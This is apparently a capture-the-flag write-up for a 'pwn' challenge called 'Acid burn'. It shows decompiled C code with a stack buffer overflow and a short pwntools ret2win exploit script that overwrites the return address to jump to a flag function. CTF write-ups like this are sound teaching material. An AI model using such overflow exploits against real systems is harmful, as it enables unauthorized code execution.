43 lines
1022 B
Markdown
43 lines
1022 B
Markdown
+++
|
|
date = '2025-04-28T12:00:00+02:00'
|
|
draft = false
|
|
title = 'Acid burn'
|
|
tags = ['pwn']
|
|
+++
|
|
|
|
Here is the decompiled code for the challenge.
|
|
```c
|
|
int main(void)
|
|
{
|
|
int iVar1;
|
|
char input [64];
|
|
|
|
printf("What is the password?\n?: ");
|
|
fflush(stdout);
|
|
fgets(input,0x80,stdin);
|
|
iVar1 = strcmp(input,"password\n");
|
|
if (iVar1 != 0) {
|
|
puts("incorrect password");
|
|
fflush(stdout);
|
|
}
|
|
return 0;
|
|
}
|
|
```
|
|
|
|
There is a pretty large buffer overflow on the `input` variable and there also conveniently is a function called `flag` that displays the flag (and of course all the protections are disabled).
|
|
This is a classic ret2win scenario where we have to overwrite the return pointer to jump to the `flag` function.
|
|
A small python script using pwntools should do the job.
|
|
```python
|
|
io = start()
|
|
|
|
payload = flat(
|
|
b'A'*(64+8),
|
|
pack(elf.symbols.flag))
|
|
|
|
write("payload", payload)
|
|
io.sendlineafter(b'?: ', payload)
|
|
io.interactive()
|
|
```
|
|
|
|
I didn't save the flag but this works and solves the challenge.
|